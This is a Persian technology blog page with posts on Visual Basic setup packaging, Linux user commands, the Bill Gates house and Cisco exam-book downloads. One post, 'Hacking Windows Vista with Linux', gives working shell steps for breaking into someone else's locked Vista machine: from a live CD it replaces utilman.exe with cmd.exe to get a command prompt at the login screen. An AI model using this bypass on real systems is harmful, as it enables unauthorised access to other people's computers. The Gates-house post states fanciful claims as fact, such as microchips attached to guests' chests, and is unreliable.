• فایل های ocx : فایل های کنترل های استفاده شده در پروژه
• فایل های vbr : برای اجرای برنامه های از راه دور به کار می روند.
• فایل های fon و ttf : این فایل ها ، فونت های مورد نیاز پروژه هستند.
• فایل های reg : این فایل ها ، اطلاعاتی را تعیین می کنند که باید به رجیستری ویندوز اضافه شوند.
• فایل های hlp : این فایل ها اسناد مربوط به برنامه کمکی را به پروژه اضافه می کنند.
9. فایل های مورد نظر را به پروژه اظافه کرده ، دکمه Next را کلیک کنید تا پنجره Cab Option ظاهر شود سپس می توانید گزینه های زیر را انتخاب کنید:
• گزینه Single Cab : فایل های Cab را به صورت یکپارچه و با هر اندازه ای ایجاد می کند.
• Multiple Cabs : فایل های Cab مختلفی ایجاد می کند تا بتوانید آن ها را بر روی چند فلاپی کپی کنید.
10. گزینه Single Cab را انتخاب کرده دکمه Next را کلیک کنید تا پنجره Installation Title ظاهر شود.
11. در کادر Installation Title عبارت مورد نظر را تایپ کرده و دکمه Next را کلیک کنید تا پنجره Start Menu Item ظاهر شود.
12. در این پنجره مکانی که منو باید قرار گیرد را انتخاب کرده ، دکمه Next را کلیک کنید تا مکان های قرار گرفتن فایل ها تعیین و برنامه ها ظاهر شود.
13. در این پنجره چنانچه می خواهید فایل های پروژه را در مکان های دیگری قرار دهید ، مکان آنها را تغییر دهید و دکمه Next را کلیک کنید تا پنجره Shared Files ظاهر شود.
14. در این پنجره چنانچه می خواهید فایل های مورد نظر در یک لحظه در اختیار چند نفر قرار گیرند (در شبکه) مربع کنار آن را کلیک کنید . سپس دکمه Next را کلیک نمایید تا پنجره Script Name ظاهر شود.
15. در پنجره Script Name نام مورد نظر را انتخاب کرده ، دکمه Finish را کلیک کنید تا برنامه Setup مورد نظر ایجاد شود .
16. در پنجره P6-VBP-Packaging Report ، دکمه Close را کلیک کنید تا از محیط نصب خارج شوید.
+ نوشته شده در  88/09/30ساعت 11:14  توسط مهیار  | 

هک ویندوز ویستا با لینوکس

با سلام
فرض کنید شما پشت یه سیستمی نشستید که ویستا روش نصب بود و پسورد داشت خوب در این جور مواقه چیکار میکنید (مخصوصآ* اگه یه fz ,tz چیزی باشه )
خوب برای اینکه بتونید وارد سیستم شید تنها کاری که باید انجام بدید اینه که یه سی دی live لینوکس رو داخل دستگاه مورد نظر قرار بدید (مثل backtrack) بعدشم مراحل زیرو دنبال کنید
بعد وارد محیط شل بشید و دستورات زیر
کد:
cd /mnt/sda1
cd windows/system32/
mv utilman.exe utilman.ash
cp cmd.exe utilman.exe
reboot
خوب در اینجا فرض بر اینه که درایو ویندوز شما sda1 هست
بعد از اینکه سیستم مجددآ راه اندازی شد و بعد از بوت شدن ویندوز با زدن کلید های win+u شما وارد cmd میشید بعد تایپ کنید explorer و هر کاری خواستید بکنید

ضمنآ این روش روی xp جواب نمیده.
+ نوشته شده در  88/06/08ساعت 12:46  توسط مهیار  | 

Disable UAC in Vista

نحوه غیر فعال کردن User Account Control یا همان UAC در ویندوز ویستا

به ادامه مطلب توجه کنید


ادامه مطلب
+ نوشته شده در  87/12/17ساعت 10:37  توسط مهیار  | 

آموزش كانكت شدن اتوماتیك كانكشن‌های PPPOE ، قبل از Login

اگر شما هم جزء آن دسته از كاربران اینترنت هستید كه به وسیله‌ی تكنولوژی DLS به اینترنت متصل هستید، می‌دانید كه جدیداً شركت‌های ارائه دهنده‌ی اینترنت كاربران خود را ملزم به استفاده از Connection های PPPOE كرده‌اند كه این كار موجب نارضایتی بسیاری از كاربران حرفه‌ای اینترنت و مدیران شیكه‌ها شده است.

یكی از محدودیت‌های این نوع ارتباط آن است كه كاربر باید به صورت دستی كانكشن PPPOE خود را ساخته و بعد از وارد كردن UserName و Password آن را Connect نماید. این كار باعث می‌شود، در صورتی كه سیستم سرور شما كه كاربران از طریق آن وارد اینترنت می‌شوند Restart شود و یا بر هر دلیلی خاموش گردد با روشن شدن دوباره‌ی سیستم حتماً باید یك نفر پشت آن بنشیند و با وارد كردن UserName و Password ویندوز ابتدا Login نماید و سپس كانكشن اینترنت با Connect كند.

این مراحل برای مدیران شبكه مخصوصاً اگر فرد قابل اطمینانی در آن مجموعه نباشد كه بتوان UserName و Password اكانت Administrator را به او داد، كار بسیار سختی است.

البته راه دیگر ی هم هست و آن راه انداختن NAT داخل مودم ADSL شماست كه البته این راه هم مشكلات خود را دارد. مثل عدم توانایی دیدن IP شما از بیرون. البته باز هم می‌توان با راه‌اندازی NAT آی پی شما را از بیرون هم دید ولی شاید برای كاربران عادی و حتی Admin ها كمی مشكل باشد چون برای هر با باز كردن و بستن Port ها مورد نیاز باید مودم ADSL شما یك بار Reset شود.

اما ماكروسافت همیشه راه حلی هم پیش پای Admin های خود قرار داده است.

شما با مطالعه‌ی این مطلب می‌توانید نه تنها اینترنت ADSL خود را بدون نیاز به حضور پشت سیستم سرور كانكت كنید بلكه می‌توانید هر حركتی كه در یك Batch File می‌توان انجام داد را قبل از Login كردن انجام دهید.

ادامه مطلب را مشاهده کنید


ادامه مطلب
+ نوشته شده در  87/12/13ساعت 10:4  توسط مهیار  | 

مدیریت کاربران در لینوکس

اطلاعات کاربران لینوکس (Linux) در /etc/passwd ذخیره می شود و شما می توانید مستقیما آنها را ویرایش کنید که اصلا این روش توصیه نمی شود. قالب این فایل به صورت زیر است (هر مورد با یک , از دیگری جدا شده است)

User name (normally all lower case)
Password (encrypted - only contains the letter 'x')
User ID (a unique number of each user)
Primary Group ID
Comment (Normally the person's full name)
Home directory (normally /home/
Default shell (normally /bin/bash)

اطلاعات password کاربران لینوکس (Linux) در /etc/shadow ذخیره شده است و تنها با دستور passwd قابل تغییر است.

اطلاعات گروه های کاربران لینوکس (Linux) هم در /etc/group ذخیره می شود

فرمان هایی که  ممکن است در این کار شما را یاری کند در زیر می آوریم :

افزودن کاربر جدید: useradd

-d home directory
-s starting program (shell)
-p password
-g (primary group assigned to the users)
-G (Other groups the user belongs to)
-m (Create the user's home directory

مثال :

useradd -gusers -Gmgmt -s/bin/shell -pxxxx -d/home/amir  -m amir

تغییر مشخصات کاربر: usermod


-d home directory
-s starting program (shell)
-p password
-g (primary group assigned to the users)
-G (Other groups the user belongs to)

مثال:

usermod -Gothers amir

حذف کاربر: userdel

-r (remove home directory)

مثال:

userdel -r mehran

تغییر رمز عبور یا گذرواژه: passwd

user's name (Only required if you are root and want to change another user's password)

مثال:

passwd amir

+ نوشته شده در  87/12/07ساعت 10:30  توسط مهیار  | 

خانه بیل گیتس

این منزل در مدینا/واشنگتن/ Medina-Washington مشرف به دریاچه واشنگتن واقع شده و مساحت زمین آن بالغ بر 5.12 acre می‌باشد. بیل گیتس زمین این خانه را در سال 1988 به مبلغ 2 میلیون دلار خرید و ساخت خانه‌اش حدود هفت سال به درازا انجامید و در سال 1995 بپایان رسید...

www.softarchive.us






از خصوصیات این منزل آنست كه به محض ورود هر مهمان یك microchip به سینه او نصب می‌گردد كه اركاندیشن و الكتریسیته و سایر احتیاجات در محل سكونت مهمان، با سلیقه و خواست مهمان، مرتبا بصورت اتوماتیك تنظیم می‌گردد. در ضمن تمام دكوراسیون و اثار هنری در قسمت اقامت مهمان مطابق با سلیقه شخصی مهمان بلافاصله تغیر می‌كنند و همیشه فقط نزدیك ترین دستگاه تلفن به آن شخص زنگ میزند.




سایر اطلاعات در مورد این خانه بدین شرح است:

مساحت این خانه 50000 square feet است. درسال 2005 قیمت این خانه 200 ملیون دلار برآورد شده است. هر یك ازدستگیره‌های درهای این خانه 2000 دلار ارزش دارد. زمانی در این خانه تعداد 300 نفر به كار مشغول بودند كه تعداد 104 نفر آنها در قسمت‌های كامپیوتر و الكترونیك منزل كار می‌كردند.




در تمام قسمت‌های این خانه حتی درون دیوارهای سنگی دوربین‌های مخفی كار گذاشته شده است. درختی كه قبلا در زمین این خانه وجود داشت و مورد علاقه بیل گیتس می‌باشد مرتبا بوسیله كامپیوتر و سایر تجهیزات الكترونیكی مراقبت می‌شود و آب و كود و محیطش بصورت اتوماتیك كنترل میگردد.




در زیر زمین این خانه یكی از مجهز ترین سالن‌های سینما در جهان برای استفاده شخصی بیل گیتس و مهمانانش ساخته شده است. هنگامی كه او میخواهد به منزل مراجعه كند آب وان حمامش بطور اتوماتیك در وان ریخته می‌شود و حرارت آن مطابق با نظر او ثابت می‌ماند. در ضمن قسمت اعظم این خانه در زیر زمین ساخته شده تا ظاهرا زیاد بزرگ بنظر نرسد!

+ نوشته شده در  87/12/05ساعت 11:19  توسط مهیار  | 

CCSP SNPA Quick Reference 2008


As a final exam preparation tool, the CCSP SNPA Quick Reference provides a concise review of all objectives on the new CCSP SNPA exam (642-523). This digital Short Cut provides you with detailed, graphical-based information, highlighting only the key topics in cram-style format.

Download CCSP SNPA Quick Reference 2008 part1
Download CCSP SNPA Quick Reference 2008 part2
Download CCSP SNPA Quick Reference 2008 part3
Download CCSP SNPA Quick Reference 2008 part4

+ نوشته شده در  87/10/02ساعت 20:15  توسط مهیار  | 

CCSP SNPA Official Exam Certification Guide 3rd Edition

CCSP SNPA Official Exam Certification Guide, Third Edition, is a best-of-breed Cisco® exam study guide that focuses specifically on the objectives for the Securing Networks with PIX and ASA (SNPA) exam. Network security consultant, Michael Gibbs, shares preparation hints and test-taking tips, helping you identify areas of weakness and improve your knowledge of firewall and Adaptive Security Appliance (ASA) security. Material is presented in a concise manner, focusing on increasing your understanding and retention of exam topics.

Download CCSP SNPA Official Exam Certification Guide 3rd Edition part1
Download CCSP SNPA Official Exam Certification Guide 3rd Edition part2
Download CCSP SNPA Official Exam Certification Guide 3rd Edition part3

+ نوشته شده در  87/10/02ساعت 20:14  توسط مهیار  | 

CCIE Voice Exam Quick Reference Sheets 2007

As a final exam preparation tool, the CCIE Voice Exam Quick Reference Sheets provides a concise review of all objectives on the new CCIE Voice written exam (350-030). This digital Short Cut provides you with detailed, graphical-based information, highlighting only the key topics in cram-style format. With this document as your guide, you will review topics on Cisco CallManager and Unity; QoS; telephony protocols; IOS IP telephony; IP IVR; IPCC; voice security, operations, and management; and infrastructure and application protocols. These fact-filled Quick Reference Sheets allow you to get all-important information at a glance, helping you focus your study on areas of weakness and to enhance memory retention of essential exam concepts.

Download CCIE Voice Exam Quick Reference Sheets part1
Download CCIE Voice Exam Quick Reference Sheets part2
Download CCIE Voice Exam Quick Reference Sheets part3

+ نوشته شده در  87/10/02ساعت 20:13  توسط مهیار  | 

CCIE Security Exam Quick Reference Sheets

As a final exam preparation tool, CCIE Security Exam Quick Reference Sheets provide a concise review of all objectives on the new CCIE Security written exam (350-018). This digital Short Cut provides you with detailed, graphical-based information, highlighting only the key topics in cram-style format. With this document as your guide, you will review topics on security and application protocols, security technologies, Cisco security applications, router and switch security, and security policy best practices. These fact-filled Quick Reference Sheets allow you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of essential exam concepts.

Download CCIE Security Exam Quick Reference Sheets 2007 part1
Download CCIE Security Exam Quick Reference Sheets 2007 part2
Download CCIE Security Exam Quick Reference Sheets 2007 part3

+ نوشته شده در  87/10/02ساعت 20:13  توسط مهیار  | 

CCIE Routing and Switching Practice Labs

The CCIE program is designed to help individuals, companies, industries, and countries succeed in the networked world by distinguishing the top echelon of internetworking experts. CCIE candidates must not only demonstrate knowledge of a broad range of subject matter at an advanced level but also prove their ability to analyze complex problems and pose solutions in time critical settings. CCIE Routing and Switching Practice Labs provides a series of complete practice labs that mirror the difficult CCIE hands-on lab exam. Written by a CCIE program manager and a CCIE engineer, this book lays out six unique end-to-end scenarios that are both complex and realistic, providing you with the practice needed to prepare for your lab examination and develop critical-thinking skills that are essential for resolving complex, real-world routing and switching problems.

Download CCIE Routing and Switching Practice Labs
+ نوشته شده در  87/10/02ساعت 20:10  توسط مهیار  | 

CCIE Practical Studies Volume I

CCIE certification is the most difficult and most rewarding of the Cisco® certifications. Although the professional and financial benefits of a CCIE are excellent, attaining this level of certification takes years of experience, study, and effort. Serving a dual role of networking reference guide for configuring Cisco routers and preparation tool for the CCIE Lab Exams, CCIE Practical Studies, Volume I, is an ideal resource to help you achieve and earn the coveted CCIE designation.

Download CCIE Practical Studies Volume I part1
Download CCIE Practical Studies Volume I part2
Download CCIE Practical Studies Volume I part3
Download CCIE Practical Studies Volume I part4

+ نوشته شده در  87/10/02ساعت 20:9  توسط مهیار  | 

CCIE Practical Studies Volume II

CCIE Practical Studies, Volume II leads CCIE candidates through the process of preparing for the CCIE lab exam by presenting them with a series of challenging laboratory exercises. A perfect companion to the best-selling first edition, this book provides coverage of CCIE lab exam topics not covered in Volume I, like the Cisco Catalyst 3550, route maps, BGP, Multicast, and QoS. Combined with Volume I, the CCIE candidate will get comprehensive coverage of the routing and switching portions of the Routing and Switching, Security, and Service Provider lab exams.

Download CCIE Practical Studies Volume II part1
Download CCIE Practical Studies Volume II part2
Download CCIE Practical Studies Volume II part3
Download CCIE Practical Studies Volume II part4
Download CCIE Practical Studies Volume II part5

+ نوشته شده در  87/10/02ساعت 20:9  توسط مهیار  | 

CCIE RnS Exam Quick Reference Sheets 2007

As a final exam preparation tool, CCIE Routing and Switching Exam Quick Reference Sheets provides a concise review of all objectives on the new CCIE Routing and Switching v3.0 written exam (350-001). This digital Short Cut provides you with detailed, graphical-based information, highlighting only the key topics in cram-style format.

Download CCIE RnS Exam Quick Reference Sheets 2007

+ نوشته شده در  87/10/02ساعت 20:9  توسط مهیار  | 

CCIE Security Exam Quick Reference Sheets

As a final exam preparation tool, CCIE Security Exam Quick Reference Sheets provide a concise review of all objectives on the new CCIE Security written exam (350-018). This digital Short Cut provides you with detailed, graphical-based information, highlighting only the key topics in cram-style format. With this document as your guide, you will review topics on security and application protocols, security technologies, Cisco security applications, router and switch security, and security policy best practices. These fact-filled Quick Reference Sheets allow you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of essential exam concepts.

Download CCIE Security Exam Quick Reference Sheets 2007 part1
Download CCIE Security Exam Quick Reference Sheets 2007 part2
Download CCIE Security Exam Quick Reference Sheets 2007 part3

+ نوشته شده در  87/10/02ساعت 20:8  توسط مهیار  | 

CCIE Routing and Switching Exam Certification Guide 3rd Ed

Wendell Odom, CCIE No. 1624

Rus Healy, CCIE No. 15025


CCIE Routing and Switching Exam Certification Guide, Third Edition, is a best of breed Cisco exam study guide that focuses specifically on the objectives for the CCIE Routing and Switching written exam. Senior instructor and best-selling author Wendell Odom shares preparation hints and test-taking tips, helping you identify areas of weakness and improve both your conceptual knowledge and hands-on skills. Material is presented in a concise manner, focusing on increasing your understanding and retention of exam topics.



Download CCIE Routing and Switching Third Edition 2007 part1
Download CCIE Routing and Switching Third Edition 2007 part2
Download CCIE Routing and Switching Third Edition 2007 part3
Download CCIE Routing and Switching Third Edition 2007 part4
Download CCIE Routing and Switching Third Edition 2007 part5
Download CCIE Routing and Switching Third Edition 2007 part6

+ نوشته شده در  87/10/02ساعت 20:8  توسط مهیار  | 

CCNA Security Official Exam Certification Guide 2008

The official study guide helps you master all the topics on the IINS exam, including
* Network security threats
* Security policies
* Network perimeter defense
* AAA configuration
* Router security
* Switch security
* Endpoint security
* SAN security
* VoIP security
* IOS firewalls
* Cisco IOS® IPS
* Cryptography
* Digital signatures
* PKI and asymmetric encryption
* IPsec VPNs

Download CCNA Security Official Exam CertGuide part1
Download CCNA Security Official Exam CertGuide part2
Download CCNA Security Official Exam CertGuide part3
Download CCNA Security Official Exam CertGuide part4
Download CCNA Security Official Exam CertGuide part5
Download CCNA Security Official Exam CertGuide part6
Download CCNA Security Official Exam CertGuide part7
Download CCNA Security Official Exam CertGuide part8
Download CCNA Security Official Exam CertGuide part9
Download CCNA Security Official Exam CertGuide part10
Download CCNA Security Official Exam CertGuide part11
Download CCNA Security Official Exam CertGuide part12

+ نوشته شده در  87/10/02ساعت 20:7  توسط مهیار  | 
مجتمع آموزشی دانا ( دانا رایانه )
اینترنت به سبک ایرانی برای جوانان ایرانی
مجتمع آموزشی دانا ( دانا رایانه )
مقالات آموزشی و علمی تخصصی
فیلم ها آموزشی
------------------------------------
آموزش در زمینه های
------------------------------------
شبکه - سخت افزار
لینوکس - سیسکو - وایرلس
برنامه نویسی
هک به معنای واقعی و در همه زمینه ها
رباتیک و الکترونیک
و گاهاَ آموزشهایی رو هم برای مبتدی ها
-----------------------------------
Contact Me With
-----------------------------------
Microtechnology@gmail.com
Mahyar.Tajdini
صفحه نخست
پست الکترونیک
آرشیو وبلاگ
عناوین مطالب وبلاگ

پیوندهای روزانه

آزمون حق العمل کاری زیر نظر استاد ارونقی در مجتمع آموزشی دانا بندرعباس
هک کردن پسوردAdmin
مروری بر 802.11 wireless
راه اندازی syslog سرور بهمراه آموزش تصویری
بازیابی پسورد کاربر ریشه در لینوکس
آموزش Password recovery در روتر های cisco
انواع کابل در شبکه های کامپيوتری
تنظیم NAT در روتر
MAC Address چیست ؟
TOEFL iBT ۲۰۰۸ edition
آرشیو پیوندهای روزانه

نوشته های پیشین

هفته اوّل بهمن 1389
هفته سوم خرداد 1389
هفته دوم خرداد 1389
هفته چهارم فروردین 1389
هفته اوّل فروردین 1389
هفته چهارم اسفند 1388
هفته سوم دی 1388
هفته چهارم آذر 1388
هفته دوم شهریور 1388
هفته سوم اسفند 1387
هفته دوم اسفند 1387
هفته اوّل اسفند 1387
هفته اوّل دی 1387
هفته اوّل آذر 1387
هفته دوم آبان 1387
هفته اوّل مهر 1387
هفته چهارم مرداد 1387
هفته دوم مرداد 1387
هفته اوّل مرداد 1387
هفته چهارم خرداد 1387
هفته سوم خرداد 1387
هفته دوم خرداد 1387
هفته چهارم فروردین 1387
هفته سوم فروردین 1387
هفته دوم فروردین 1387
هفته اوّل فروردین 1387
هفته چهارم اسفند 1386
هفته سوم اسفند 1386
هفته دوم اسفند 1386
هفته اوّل اسفند 1386
هفته چهارم بهمن 1386
هفته سوم بهمن 1386
هفته دوم بهمن 1386
هفته اوّل بهمن 1386
هفته چهارم دی 1386
هفته سوم دی 1386
آرشيو

آرشیو موضوعی

مقالات آموزشی - علمی تخصصی
آموزش MATLAB و پردازش تصویر
مقالات آموزشی شبکه - امنیت - لینوکس
اخبار دنیای فناوری اطلاعات و ارتباطات
مطالب جالب
رباتیک
الکترونیک
CCIE
CCNA
CCNP CCSP CCIP CCVP

پیوندها

آموزش برنامه نویسی
یک سبد آشفتگی
ریاضیات برای همه
آموزش شبکه
وبلاگی متفاوت
آموزش - مقاله علمی تخصصی - مقالات آموزشی
خط سرخ
بنیاد حفظ آثار و نشر ارزشهای دفاع مقدس و بسیج
امنیت سیستم های لینوکس
مهندس روحانی
جزوه کارگاه لینوکس جهاد دانشگاهی
آموزش برای همه ( درساره )
فرم ثبت موضوع پروژه دانشجویان
Mahyar TajDini Resume
شبکه و امنیت شبکه
آزمون حق العمل کاری زیر نظر استاد ارونقی در مجتمع آموزشی دانا بندرعباس
 RSS 

POWERED BY
،Mahyar Tajdini